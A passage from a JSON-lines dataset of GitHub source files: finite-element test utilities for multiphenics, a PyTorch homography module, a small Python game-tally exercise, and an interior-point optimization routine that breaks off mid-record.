4*x[1]*x[1]\", degree=2)\n block_form[0] = f1*v1*dx\n elif len(shape_1) == 1 and shape_1[0] == 2:\n f1 = Expression((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\"), degree=2)\n block_form[0] = inner(f1, v1)*dx\n elif len(shape_1) == 1 and shape_1[0] == 3:\n f1 = Expression((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\", \"7*x[0] + 11*x[1]*x[1]\"), degree=2)\n block_form[0] = inner(f1, v1)*dx\n elif len(shape_1) == 2:\n f1 = Expression(((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\"),\n (\"7*x[0] + 11*x[1]*x[1]\", \"13*x[0] + 17*x[1]*x[1]\")), degree=2)\n block_form[0] = inner(f1, v1)*dx\n shape_2 = block_V[1].ufl_element().value_shape()\n if len(shape_2) == 0:\n f2 = Expression(\"2*x[1] + 4*x[0]*x[0]\", degree=2)\n block_form[1] = f2*v2*dx\n elif len(shape_2) == 1 and shape_2[0] == 2:\n f2 = Expression((\"2*x[1] + 4*x[0]*x[0]\", \"3*x[1] + 5*x[0]*x[0]\"), degree=2)\n block_form[1] = inner(f2, v2)*dx\n elif len(shape_2) == 1 and shape_2[0] == 3:\n f2 = Expression((\"2*x[1] + 4*x[0]*x[0]\", \"3*x[1] + 5*x[0]*x[0]\", \"7*x[1] + 11*x[0]*x[0]\"), degree=2)\n block_form[1] = inner(f2, v2)*dx\n elif len(shape_2) == 2:\n f2 = Expression(((\"2*x[1] + 4*x[0]*x[0]\", \"3*x[1] + 5*x[0]*x[0]\"),\n (\"7*x[1] + 11*x[0]*x[0]\", \"13*x[1] + 17*x[0]*x[0]\")), degree=2)\n block_form[1] = inner(f2, v2)*dx\n return block_form\n\n# ================ LEFT-HAND SIDE BLOCK FORM GENERATOR ================ #\n# Computation of lhs block form for single block\ndef get_lhs_block_form_1(block_V):\n block_u = BlockTrialFunction(block_V)\n block_v = BlockTestFunction(block_V)\n (u, ) = block_split(block_u)\n (v, ) = block_split(block_v)\n shape_1 = block_V[0].ufl_element().value_shape()\n if len(shape_1) == 0:\n f = Expression(\"2*x[0] + 4*x[1]*x[1]\", degree=2)\n block_form = [[f*u*v*dx]]\n elif len(shape_1) == 1 and shape_1[0] == 2:\n f = Expression((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\"), degree=2)\n block_form = [[(f[0]*u[0]*v[0] + f[1]*u[1].dx(1)*v[1])*dx]]\n elif len(shape_1) == 1 and shape_1[0] == 3:\n f = Expression((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\", \"7*x[0] + 11*x[1]*x[1]\"), degree=2)\n block_form = [[(f[0]*u[0]*v[0] + f[1]*u[1].dx(1)*v[1] + f[2]*u[2].dx(0)*v[2].dx(1))*dx]]\n elif len(shape_1) == 2:\n f = Expression(((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\"),\n (\"7*x[0] + 11*x[1]*x[1]\", \"13*x[0] + 17*x[1]*x[1]\")), degree=2)\n block_form = [[(f[0, 0]*u[0, 0]*v[0, 0] + f[0, 1]*u[0, 1].dx(1)*v[0, 1] + f[1, 0]*u[1, 0].dx(0)*v[1, 0].dx(1) + f[1, 1]*u[1, 1].dx(0)*v[1, 1])*dx]]\n return block_form\n\n# Computation of lhs block form for two blocks\ndef get_lhs_block_form_2(block_V):\n block_u = BlockTrialFunction(block_V)\n block_v = BlockTestFunction(block_V)\n (u1, u2) = block_split(block_u)\n (v1, v2) = block_split(block_v)\n block_form = [[None, None], [None, None]]\n # (1, 1) block\n shape_1 = block_V[0].ufl_element().value_shape()\n if len(shape_1) == 0:\n f1 = Expression(\"2*x[0] + 4*x[1]*x[1]\", degree=2)\n block_form[0][0] = f1*u1*v1*dx\n elif len(shape_1) == 1 and shape_1[0] == 2:\n f1 = Expression((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\"), degree=2)\n block_form[0][0] = (f1[0]*u1[0]*v1[0] + f1[1]*u1[1].dx(1)*v1[1])*dx\n elif len(shape_1) == 1 and shape_1[0] == 3:\n f1 = Expression((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\", \"7*x[0] + 11*x[1]*x[1]\"), degree=2)\n block_form[0][0] = (f1[0]*u1[0]*v1[0] + f1[1]*u1[1].dx(1)*v1[1] + f1[2]*u1[2].dx(0)*v1[2].dx(1))*dx\n elif len(shape_1) == 2:\n f1 = Expression(((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\"),\n (\"7*x[0] + 11*x[1]*x[1]\", \"13*x[0] + 17*x[1]*x[1]\")), degree=2)\n block_form[0][0] = (f1[0, 0]*u1[0, 0]*v1[0, 0] + f1[0, 1]*u1[0, 1].dx(1)*v1[0, 1] + f1[1, 0]*u1[1, 0].dx(0)*v1[1, 0].dx(1) + f1[1, 1]*u1[1, 1].dx(0)*v1[1, 1])*dx\n # (2, 2) block\n shape_2 = block_V[1].ufl_element().value_shape()\n if len(shape_2) == 0:\n f2 = Expression(\"2*x[1] + 4*x[0]*x[0]\", degree=2)\n block_form[1][1] = f2*u2*v2*dx\n elif len(shape_2) == 1 and shape_2[0] == 2:\n f2 = Expression((\"2*x[1] + 4*x[0]*x[0]\", \"3*x[1] + 5*x[0]*x[0]\"), degree=2)\n block_form[1][1] = (f2[0]*u2[0]*v2[0] + f2[1]*u2[1].dx(1)*v2[1])*dx\n elif len(shape_2) == 1 and shape_2[0] == 3:\n f2 = Expression((\"2*x[1] + 4*x[0]*x[0]\", \"3*x[1] + 5*x[0]*x[0]\", \"7*x[1] + 11*x[0]*x[0]\"), degree=2)\n block_form[1][1] = (f2[0]*u2[0]*v2[0] + f2[1]*u2[1].dx(1)*v2[1] + f2[2]*u2[2].dx(0)*v2[2].dx(1))*dx\n elif len(shape_2) == 2:\n f2 = Expression(((\"2*x[1] + 4*x[0]*x[0]\", \"3*x[1] + 5*x[0]*x[0]\"),\n (\"7*x[1] + 11*x[0]*x[0]\", \"13*x[1] + 17*x[0]*x[0]\")), degree=2)\n block_form[1][1] = (f2[0, 0]*u2[0, 0]*v2[0, 0] + f2[0, 1]*u2[0, 1].dx(1)*v2[0, 1] + f2[1, 0]*u2[1, 0].dx(0)*v2[1, 0].dx(1) + f2[1, 1]*u2[1, 1].dx(0)*v2[1, 1])*dx\n # (1, 2) and (2, 1) blocks\n if len(shape_1) == 0:\n if len(shape_2) == 0:\n block_form[0][1] = f1*u2*v1*dx\n block_form[1][0] = f2*u1*v2*dx\n elif len(shape_2) == 1 and shape_2[0] == 2:\n block_form[0][1] = f1*u2[0]*v1*dx + f1*u2[1]*v1.dx(1)*dx\n block_form[1][0] = (f2[0]*u1*v2[0] + f2[1]*u1.dx(1)*v2[1])*dx\n elif len(shape_2) == 1 and shape_2[0] == 3:\n block_form[0][1] = f1*u2[0]*v1*dx + f1*u2[1]*v1.dx(1)*dx + f1*u2[2]*v1*dx\n block_form[1][0] = (f2[0]*u1*v2[0] + f2[1]*u1.dx(1)*v2[1] + f2[2]*u1.dx(0)*v2[2].dx(1))*dx\n elif len(shape_2) == 2:\n block_form[0][1] = f1*u2[0, 0]*v1*dx + f1*u2[1, 1]*v1.dx(0)*dx\n block_form[1][0] = (f2[0, 0]*u1*v2[0, 0] + f2[0, 1]*u1.dx(1)*v2[0, 1] + f2[1, 0]*u1.dx(0)*v2[1, 0].dx(1) + f2[1, 1]*u1.dx(0)*v2[1, 1])*dx\n elif len(shape_1) == 1 and shape_1[0] == 2:\n if len(shape_2) == 0:\n block_form[0][1] = (f1[0]*u2*v1[0] + f1[1]*u2.dx(1)*v1[1])*dx\n block_form[1][0] = f2*u1[0]*v2*dx + f2*u1[1]*v2.dx(0)*dx\n elif len(shape_2) == 1 and shape_2[0] == 2:\n block_form[0][1] = (f1[0]*u2[0]*v1[0] + f1[1]*u2[1].dx(1)*v1[1])*dx\n block_form[1][0] = (f2[0]*u1[0]*v2[0] + f2[1]*u1[1].dx(1)*v2[1])*dx\n elif len(shape_2) == 1 and shape_2[0] == 3:\n block_form[0][1] = (f1[0]*u2[0]*v1[0] + f1[1]*u2[1].dx(1)*v1[1] + f1[0]*u2[2]*v1[0])*dx\n block_form[1][0] = (f2[0]*u1[0]*v2[0] + f2[1]*u1[1].dx(1)*v2[1] + f2[2]*u1[0].dx(0)*v2[2].dx(1))*dx\n elif len(shape_2) == 2:\n block_form[0][1] = (f1[0]*u2[0, 0]*v1[0] + f1[1]*u2[1, 1].dx(1)*v1[1])*dx\n block_form[1][0] = (f2[0, 0]*u1[0]*v2[0, 0] + f2[0, 1]*u1[0].dx(1)*v2[0, 1] + f2[1, 0]*u1[1].dx(0)*v2[1, 0].dx(1) + f2[1, 1]*u1[0].dx(0)*v2[1, 1])*dx\n elif len(shape_1) == 1 and shape_1[0] == 3:\n if len(shape_2) == 0:\n block_form[0][1] = (f1[0]*u2*v1[0] + f1[1]*u2.dx(1)*v1[1] + f1[2]*u2.dx(0)*v1[2].dx(1))*dx\n block_form[1][0] = f2*u1[0]*v2*dx + f2*u1[1]*v2.dx(1)*dx + f2*u1[2]*v2*dx\n elif len(shape_2) == 1 and shape_2[0] == 2:\n block_form[0][1] = (f1[0]*u2[0]*v1[0] + f1[1]*u2[1].dx(1)*v1[1] + f1[2]*u2[0].dx(0)*v1[2].dx(1))*dx\n block_form[1][0] = (f2[0]*u1[0]*v2[0] + f2[1]*u1[1].dx(1)*v2[1] + f2[1]*u1[2].dx(1)*v2[1])*dx\n elif len(shape_2) == 1 and shape_2[0] == 3:\n block_form[0][1] = (f1[0]*u2[0]*v1[0] + f1[1]*u2[1].dx(1)*v1[1] + f1[2]*u2[2].dx(0)*v1[2].dx(1))*dx\n block_form[1][0] = (f2[0]*u1[0]*v2[0] + f2[1]*u1[1].dx(1)*v2[1] + f2[2]*u1[2].dx(0)*v2[2].dx(1))*dx\n elif len(shape_2) == 2:\n block_form[0][1] = (f1[0]*u2[0, 0]*v1[0] + f1[1]*u2[1, 0].dx(1)*v1[1] + f1[2]*u2[0, 1].dx(0)*v1[2].dx(1) + f1[0]*u2[1, 1]*v1[0].dx(1))*dx\n block_form[1][0] = (f2[0, 0]*u1[0]*v2[0, 0] + f2[0, 1]*u1[1].dx(1)*v2[0, 1] + f2[1, 0]*u1[2].dx(0)*v2[1, 0].dx(1) + f2[1, 1]*u1[0].dx(0)*v2[1, 1])*dx\n elif len(shape_1) == 2:\n if len(shape_2) == 0:\n block_form[0][1] = (f1[0, 0]*u2*v1[0, 0] + f1[0, 1]*u2.dx(1)*v1[0, 1] + f1[1, 0]*u2.dx(0)*v1[1, 0].dx(1) + f1[1, 1]*u2.dx(0)*v1[1, 1])*dx\n block_form[1][0] = f2*u1[0, 0]*v2*dx + f2*u1[1, 1]*v2.dx(1)*dx\n elif len(shape_2) == 1 and shape_2[0] == 2:\n block_form[0][1] = (f1[0, 0]*u2[0]*v1[0, 0] + f1[0, 1]*u2[0].dx(1)*v1[0, 1] + f1[1, 0]*u2[1].dx(0)*v1[1, 0].dx(1) + f1[1, 1]*u2[1].dx(0)*v1[1, 1])*dx\n block_form[1][0] = (f2[0]*u1[0, 0]*v2[0] + f2[1]*u1[1, 1].dx(1)*v2[1])*dx\n elif len(shape_2) == 1 and shape_2[0] == 3:\n block_form[0][1] = (f1[0, 0]*u2[0]*v1[0, 0] + f1[0, 1]*u2[1].dx(1)*v1[0, 1] + f1[1, 0]*u2[2].dx(0)*v1[1, 0].dx(1) + f1[1, 1]*u2[0].dx(0)*v1[1, 1])*dx\n block_form[1][0] = (f2[0]*u1[0, 0]*v2[0] + f2[1]*u1[1, 0].dx(1)*v2[1] + f2[2]*u1[0, 1].dx(0)*v2[2].dx(1) + f2[0]*u1[1, 1]*v2[0].dx(1))*dx\n elif len(shape_2) == 2:\n block_form[0][1] = (f1[0, 0]*u2[0, 0]*v1[0, 0] + f1[0, 1]*u2[0, 1].dx(1)*v1[0, 1] + f1[1, 0]*u2[1, 0].dx(0)*v1[1, 0].dx(1) + f1[1, 1]*u2[1, 1].dx(0)*v1[1, 1])*dx\n block_form[1][0] = (f2[0, 0]*u1[0, 0]*v2[0, 0] + f2[0, 1]*u1[0, 1].dx(1)*v2[0, 1] + f2[1, 0]*u1[1, 0].dx(0)*v2[1, 0].dx(1) + f2[1, 1]*u1[1, 1].dx(0)*v2[1, 1])*dx\n return block_form\n\n# ================ RIGHT-HAND SIDE BLOCK FORM ASSEMBLER ================ #\ndef assemble_and_block_assemble_vector(block_form):\n N = len(block_form)\n assert N in (1, 2)\n if N == 1:\n return assemble(block_form[0]), block_assemble(block_form)\n else:\n return (assemble(block_form[0]), assemble(block_form[1])), block_assemble(block_form)\n\ndef apply_bc_and_block_bc_vector(rhs, block_rhs, block_bcs):\n if block_bcs is None:\n return\n N = len(block_bcs)\n assert N in (1, 2)\n if N == 1:\n [bc.apply(rhs) for bc in block_bcs[0]]\n block_bcs.apply(block_rhs)\n else:\n [bc1.apply(rhs[0]) for bc1 in block_bcs[0]]\n [bc2.apply(rhs[1]) for bc2 in block_bcs[1]]\n block_bcs.apply(block_rhs)\n\ndef apply_bc_and_block_bc_vector_non_linear(rhs, block_rhs, block_bcs, block_V):\n if block_bcs is None:\n return (None, None)\n N = len(block_bcs)\n assert N in (1, 2)\n if N == 1:\n function = Function(block_V[0])\n [bc.apply(rhs, function.vector()) for bc in block_bcs[0]]\n block_function = BlockFunction(block_V)\n block_bcs.apply(block_rhs, block_function.block_vector())\n return (function, block_function)\n else:\n function1 = Function(block_V[0])\n [bc1.apply(rhs[0], function1.vector()) for bc1 in block_bcs[0]]\n function2 = Function(block_V[1])\n [bc2.apply(rhs[1], function2.vector()) for bc2 in block_bcs[1]]\n block_function = BlockFunction(block_V)\n block_bcs.apply(block_rhs, block_function.block_vector())\n return ((function1, function2), block_function)\n\n# ================ LEFT-HAND SIDE BLOCK FORM ASSEMBLER ================ #\ndef assemble_and_block_assemble_matrix(block_form):\n N = len(block_form)\n assert N in (1, 2)\n M = len(block_form[0])\n assert M == N\n if N == 1:\n return assemble(block_form[0][0]), block_assemble(block_form)\n else:\n return ((assemble(block_form[0][0]), assemble(block_form[0][1])), (assemble(block_form[1][0]), assemble(block_form[1][1]))), block_assemble(block_form)\n\ndef apply_bc_and_block_bc_matrix(lhs, block_lhs, block_bcs):\n if block_bcs is None:\n return\n N = len(block_bcs)\n assert N in (1, 2)\n if N == 1:\n [bc.apply(lhs) for bc in block_bcs[0]]\n block_bcs.apply(block_lhs)\n else:\n [bc0.apply(lhs[0][0]) for bc0 in block_bcs[0]]\n [bc0.zero(lhs[0][1]) for bc0 in block_bcs[0]]\n [bc1.zero(lhs[1][0]) for bc1 in block_bcs[1]]\n [bc1.apply(lhs[1][1]) for bc1 in block_bcs[1]]\n block_bcs.apply(block_lhs)\n\n# ================ BLOCK FUNCTIONS GENERATOR ================ #\n# Computation of block function for single block\ndef get_list_of_functions_1(block_V):\n shape_1 = block_V[0].ufl_element().value_shape()\n if len(shape_1) == 0:\n f = Expression(\"2*x[0] + 4*x[1]*x[1]\", degree=2)\n elif len(shape_1) == 1 and shape_1[0] == 2:\n f = Expression((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\"), degree=2)\n elif len(shape_1) == 1 and shape_1[0] == 3:\n f = Expression((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\", \"7*x[0] + 11*x[1]*x[1]\"), degree=2)\n elif len(shape_1) == 2:\n f = Expression(((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\"),\n (\"7*x[0] + 11*x[1]*x[1]\", \"13*x[0] + 17*x[1]*x[1]\")), degree=2)\n return [project(f, block_V[0])]\n\n# Computation of block function for two blocks\ndef get_list_of_functions_2(block_V):\n shape_1 = block_V[0].ufl_element().value_shape()\n if len(shape_1) == 0:\n f1 = Expression(\"2*x[0] + 4*x[1]*x[1]\", degree=2)\n elif len(shape_1) == 1 and shape_1[0] == 2:\n f1 = Expression((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\"), degree=2)\n elif len(shape_1) == 1 and shape_1[0] == 3:\n f1 = Expression((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\", \"7*x[0] + 11*x[1]*x[1]\"), degree=2)\n elif len(shape_1) == 2:\n f1 = Expression(((\"2*x[0] + 4*x[1]*x[1]\", \"3*x[0] + 5*x[1]*x[1]\"),\n (\"7*x[0] + 11*x[1]*x[1]\", \"13*x[0] + 17*x[1]*x[1]\")), degree=2)\n shape_2 = block_V[1].ufl_element().value_shape()\n if len(shape_2) == 0:\n f2 = Expression(\"2*x[1] + 4*x[0]*x[0]\", degree=2)\n elif len(shape_2) == 1 and shape_2[0] == 2:\n f2 = Expression((\"2*x[1] + 4*x[0]*x[0]\", \"3*x[1] + 5*x[0]*x[0]\"), degree=2)\n elif len(shape_2) == 1 and shape_2[0] == 3:\n f2 = Expression((\"2*x[1] + 4*x[0]*x[0]\", \"3*x[1] + 5*x[0]*x[0]\", \"7*x[1] + 11*x[0]*x[0]\"), degree=2)\n elif len(shape_2) == 2:\n f2 = Expression(((\"2*x[1] + 4*x[0]*x[0]\", \"3*x[1] + 5*x[0]*x[0]\"),\n (\"7*x[1] + 11*x[0]*x[0]\", \"13*x[1] + 17*x[0]*x[0]\")), degree=2)\n return [project(f1, block_V[0]), project(f2, block_V[1])]\n\n# ================ PARALLEL SUPPORT ================ #\n# Gather matrices, vector and dicts on zero-th process\ndef allgather(obj, comm, **kwargs):\n assert isinstance(obj, (dict, tuple, GenericMatrix, GenericVector))\n if isinstance(obj, (dict, tuple)):\n assert \"block_dofmap\" in kwargs\n assert \"dofmap\" in kwargs\n if isinstance(obj, tuple):\n assert isinstance(kwargs[\"dofmap\"], tuple)\n all_block_to_original1 = comm.allgather(obj[0])\n all_ownership_ranges1 = comm.allgather(kwargs[\"dofmap\"][0].ownership_range())\n all_block_ownership_ranges1 = comm.allgather(kwargs[\"block_dofmap\"].sub_index_map(0).local_range())\n all_block_to_original2 = comm.allgather(obj[1])\n all_ownership_ranges2 = comm.allgather(kwargs[\"dofmap\"][1].ownership_range())\n all_block_ownership_ranges2 = comm.allgather(kwargs[\"block_dofmap\"].sub_index_map(1).local_range())\n base_index1 = [None]*comm.Get_size()\n block_base_index1 = [None]*comm.Get_size()\n base_index2 = [None]*comm.Get_size()\n block_base_index2 = [None]*comm.Get_size()\n for r in range(comm.Get_size() + 1):\n if r == 0:\n base_index1[0] = 0\n base_index2[0] = all_ownership_ranges1[-1][1]\n block_base_index1[0] = 0\n if r > 0:\n block_base_index2[r-1] = block_base_index1[r-1] + (all_block_ownership_ranges1[r-1][1] - all_block_ownership_ranges1[r-1][0])\n if r < comm.Get_size():\n base_index1[r] = all_ownership_ranges1[r-1][1]\n base_index2[r] = all_ownership_ranges1[-1][1] + all_ownership_ranges2[r-1][1]\n block_base_index1[r] = block_base_index2[r-1] + (all_block_ownership_ranges2[r-1][1] - all_block_ownership_ranges2[r-1][0])\n output = dict()\n for r in range(comm.Get_size()):\n for (block1, original1) in all_block_to_original1[r].items():\n if original1 < all_ownership_ranges1[r][1] - all_ownership_ranges1[r][0]:\n output[block1 + block_base_index1[r]] = original1 + base_index1[r]\n for (block2, original2) in all_block_to_original2[r].items():\n if original2 < all_ownership_ranges2[r][1] - all_ownership_ranges2[r][0]:\n # Note that we use block_base_index1 instead of block_base_index2 due to internal storage of block2\n output[block2 + block_base_index1[r]] = original2 + base_index2[r]\n return output\n else:\n assert isinstance(obj, dict)\n all_block_to_original1 = comm.allgather(obj)\n all_ownership_ranges1 = comm.allgather(kwargs[\"dofmap\"].ownership_range())\n all_block_ownership_ranges1 = comm.allgather(kwargs[\"block_dofmap\"].sub_index_map(0).local_range())\n base_index1 = [ownr[0] for ownr in all_ownership_ranges1]\n block_base_index1 = [ownr[0] for ownr in all_block_ownership_ranges1]\n output = dict()\n for r in range(comm.Get_size()):\n for (block1, original1) in all_block_to_original1[r].items():\n if original1 < all_ownership_ranges1[r][1] - all_ownership_ranges1[r][0]:\n output[block1 + block_base_index1[r]] = original1 + base_index1[r]\n return output\n elif isinstance(obj, GenericMatrix):\n return vstack(comm.allgather(obj.array()))\n elif isinstance(obj, GenericVector):\n return hstack(comm.allgather(obj.get_local()))\n else:\n raise AssertionError(\"Invalid arguments to allgather\")\n","repo_name":"multiphenics/multiphenics","sub_path":"tests/unit/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":35336,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"72"} +{"seq_id":"17667305802","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass ComputeHomography(nn.Module):\n\n def __init__(self, opts):\n super(ComputeHomography, self).__init__()\n self.opts = opts\n self.h, self.w = opts.height, opts.width\n self.num_depths = opts.num_planes\n self.depth_proposals = 1 / torch.linspace(1 / opts.near_plane, 1 / opts.far_plane, opts.num_planes)\n self.depth_proposals = self.depth_proposals.view(opts.num_planes)\n self.src_corner_pts = [torch.Tensor([(self.w - 1) * i, (self.h - 1) * j, 1]) for i in range(2) for j in range(2)]\n\n def get_homography_matrices(self, kmats, r_mats, t_vec):\n device_ = kmats.device\n batch_size = r_mats.shape[0]\n num_dep = self.num_depths\n r_mats = r_mats.view(batch_size, 1, 3, 3).expand(batch_size, num_dep, 3, 3)\n r_mats = r_mats.contiguous().view(-1, 3, 3)\n t_vec = t_vec.view(batch_size, 1, 3, 1).contiguous().expand(batch_size, num_dep, 3, 1)\n t_vec = t_vec.contiguous().view(-1, 3, 1)\n kinv = torch.stack([torch.inverse(k) for k in kmats])\n kmats = kmats.view(-1, 1, 3, 3).expand(batch_size, num_dep, 3, 3).contiguous()\n kinv = kinv.view(-1, 1, 3, 3).expand(batch_size, num_dep, 3, 3).contiguous()\n kinv, kmats = kinv.view(-1, 3, 3), kmats.view(-1, 3, 3)\n n = torch.Tensor([0, 0, 1]).view(1, 1, 3).expand(r_mats.shape[0], 1, 3)\n n = n.to(device_).float()\n depth_proposals = self.depth_proposals.view(1, num_dep, 1).to(device_)\n depth_proposals = depth_proposals.expand(batch_size, num_dep, 1).contiguous()\n depth_proposals = depth_proposals.view(-1, 1, 1)\n num_1 = torch.bmm(torch.bmm(torch.bmm(r_mats.permute(0, 2, 1), t_vec), n), r_mats.permute(0, 2, 1))\n den_1 = -depth_proposals - torch.bmm(torch.bmm(n, r_mats.permute(0, 2, 1)), t_vec)\n h_mats = torch.bmm(torch.bmm(kmats, (r_mats.permute(0, 2, 1) + (num_1 / den_1))), kinv)\n h_mats = h_mats.view(batch_size, num_dep, 3, 3)\n return h_mats\n\n def forward(self, kmats, r_mats, t_vecs):\n hmats_1 = self.get_homography_matrices(kmats, r_mats, t_vecs)\n return hmats_1","repo_name":"tedyhabtegebrial/gvsnet","sub_path":"models/mpi/compute_homography.py","file_name":"compute_homography.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"72"} +{"seq_id":"75020914471","text":"'''amogus'''\n\n\ndef main():\n '''sugoma'''\n dic = {}\n ded = []\n ded_crew = []\n alive_crew = []\n sussy = 0\n while True:\n dict_in = input()\n if dict_in[:2] == '{\"':\n temp = dict_in.replace('\"}', '').replace('{\"', '').split('\" : \"')\n dic[temp[0]] = temp[1]\n if dict_in == 'Start':\n break\n while True:\n vote = input()\n if vote == 'End':\n break\n ded.append(vote)\n for i, j in sorted(dic.items()):\n if i in ded:\n ded_crew.append({i: j})\n else:\n if j == 'Impostor':\n sussy += 1\n alive_crew.append({i: j})\n res(sussy, alive_crew, ded_crew)\n\n\ndef res(sussy, alive_crew, ded_crew):\n '''heheboi'''\n print('%d Impostor Remains' % sussy)\n print('***Alive***')\n for i in alive_crew:\n for j, k in i.items():\n print(j, k, sep=' : ')\n print('***Dead***')\n for i in ded_crew:\n for j, k in i.items():\n print(j, k, sep=' : ')\n\n\nmain()\n","repo_name":"Maldin0/Python","sub_path":"155-Impostor.py","file_name":"155-Impostor.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19830918538","text":"\nimport numpy as np\nfrom src import utils\n\n\ndef interior_pt(func, ineq_constraints, eq_constraints_mat, eq_constraints_rhs, x0):\n # variable eq_constraints_rhs is left unused because we assume feasible start and remain feasible\n t = 1\n mu = 10\n ineq_tol = 1e-9 # tolerance for m/t\n m = len(ineq_constraints)\n func_to_minimize = LogBarrier(func, ineq_constraints, t)\n full_path = np.array([x0])\n max_iter = 4000\n newton_tol = ineq_tol/10 # tolerance for newton decrement\n n_outer_loop = 0\n while m/t >= ineq_tol:\n n_outer_loop += 1\n print(\"\\n\")\n print(\"Minimizing log-barrier function with t = \" + str(t) + \":\")\n print(\"\\n\")\n # find minimizer\n tmp_path, tmp_is_converged, tmp_report_str = newton_constrained_method(func_to_minimize, x0, newton_tol, max_iter, eq_constraints_mat)\n if not tmp_is_converged:\n full_path = np.append(full_path, tmp_path[1:, :], axis=0)\n final_val, grad = func_to_minimize(full_path[-1, :])\n report_str = \"Convergence Failed in interior loop, Reached X = \" + str(tmp_path[-1, :]) + \", Objective function value:\" + str(final_val/t) + '\\n'\n report_str += 't value: ' + str(t)\n return full_path, report_str\n # update t\n t *= mu\n func_to_minimize.t = t\n # update x0 to the last convergence point\n x0 = tmp_path[-1, :]\n full_path = np.append(full_path, tmp_path[1:, :], axis=0)\n # report convergence\n final_val, grad = func_to_minimize(full_path[-1, :])\n report_str = \"Converged at X = \" + str(tmp_path[-1, :]) + \", Objective function value:\" + str(final_val/t) + \", m/t sub-optimality:\" + str(m/t) + '\\n'\n report_str += 'Number of outer iterations: ' + str(n_outer_loop) + ', number of total inner iterations: ' + str(full_path.shape[0])\n report_str += ', final t value: ' + str(t)\n return full_path, report_str\n\n\ndef newton_constrained_method(f, x0, newton_tol, max_iter, eq_constraints_mat):\n full_path = np.zeros([max_iter + 1, len(x0)])\n full_path[0, :] = x0\n # newton method, assuming equality constraints with feasible start\n is_converged = 0\n i = 0\n x = x0\n back_track_factor = 0.2\n wolfe_slope_ratio = 1e-4\n num_eq_constraints = np.shape(eq_constraints_mat)[0]\n # convergence loop\n while i < max_iter and is_converged == 0:\n func_val, grad, hess = f(x, calc_hessian=True)\n # repeatedly solve the local quadratic problem with the equality constraints of preserving feasibility\n # assuming feasible start so no accounting for residual\n if num_eq_constraints > 0:\n kkt_mat = np.append(hess, np.transpose(eq_constraints_mat), axis=1)\n tmp_mat = np.append(eq_constraints_mat, np.zeros((num_eq_constraints, num_eq_constraints)))\n kkt_mat = np.append(kkt_mat, [tmp_mat], axis=0)\n kkt_rhs = np.append(-grad, np.zeros(num_eq_constraints))\n else:\n kkt_mat = hess\n kkt_rhs = -grad\n sol = np.linalg.solve(kkt_mat, kkt_rhs)\n pk = sol[0:len(x0)] # step direction\n # w = sol[len(x0):] # new lagrange multipliers, not needed in this method\n\n # apply wolfe condition on step size\n step_size = 1 # initial un-damped step length\n x_new = x + step_size * pk\n func_val_new, grad_new = f(x_new)\n while func_val_new > func_val + wolfe_slope_ratio * step_size * np.dot(grad, pk) or np.isnan(func_val_new):\n # backtrack\n step_size *= back_track_factor\n # update x and obj function\n x_new = x + step_size * pk\n func_val_new, grad_new = f(x_new)\n # save x\n full_path[i + 1, :] = x_new\n # calculate newton decrement\n newton_decrement = np.sqrt(np.dot(pk, np.dot(hess, pk)))\n # calculate obj function change\n val_change = np.abs(func_val_new-func_val)\n # print report to console\n report_str = utils.report_iteration(i, x_new, func_val_new, newton_decrement, val_change)\n # check convergence\n if (newton_decrement**2)/2 < newton_tol:\n is_converged = 1\n full_path = np.delete(full_path, (np.arange(i + 1, len(full_path))), 0)\n print(\"Convergence achieved at iteration: \" + str(i) + \", Function value: \"\n + str(func_val_new) + \", Args: \" + str(x_new))\n return full_path, is_converged, report_str\n # prepare next iteration\n x = x_new\n i += 1\n # if we reached here convergence has failed\n\n return full_path, is_converged, report_str\n\n\nclass LogBarrier:\n # function-like class for calling a function with log barrier\n def __init__(self, func, ineq_constraints, t):\n self.func = func\n self.ineq_constraints = ineq_constraints\n self.t = t\n\n def __call__(self, x, calc_hessian=False):\n outputs = self.func(x, calc_hessian)\n val = outputs[0]*self.t\n grad = outputs[1]*self.t\n if calc_hessian:\n hessian = outputs[2]*self.t\n for f in self.ineq_constraints:\n val_i, grad_i = f(x)\n val -= np.log(-val_i)\n # from lecture 9 slide 7, with hessian of constraints = 0:\n grad -= grad_i / val_i\n if calc_hessian:\n hessian += np.outer(grad_i, np.transpose(grad_i)) / (val_i ** 2) # + 0\n if calc_hessian:\n return val, grad, hessian\n else:\n return val, grad\n\n\n# NOT FINISHED, NOT USED, WROTE FOR UNFEASIBLE START, WHICH IS NOT THE CASE IN THIS EXCERCISE\ndef primal_dual_method(f, x0, res_tol, max_iter, eq_constraints_mat, eq_constraints_rhs):\n # this method does not assume feasible start\n x = x0\n w_prev = []\n backtrack_factor = 0.2\n alpha = 0.25\n is_converged = 0\n i = 0\n num_constraints = len(eq_constraints_rhs)\n while i < max_iter and is_converged == 0:\n val, grad, hess = f(x, calc_hessian=True)\n # solve linear system in order get primal and dual directions\n kkt_mat = np.append(hess,np.transpose(eq_constraints_mat),axis=1)\n tmp_mat = 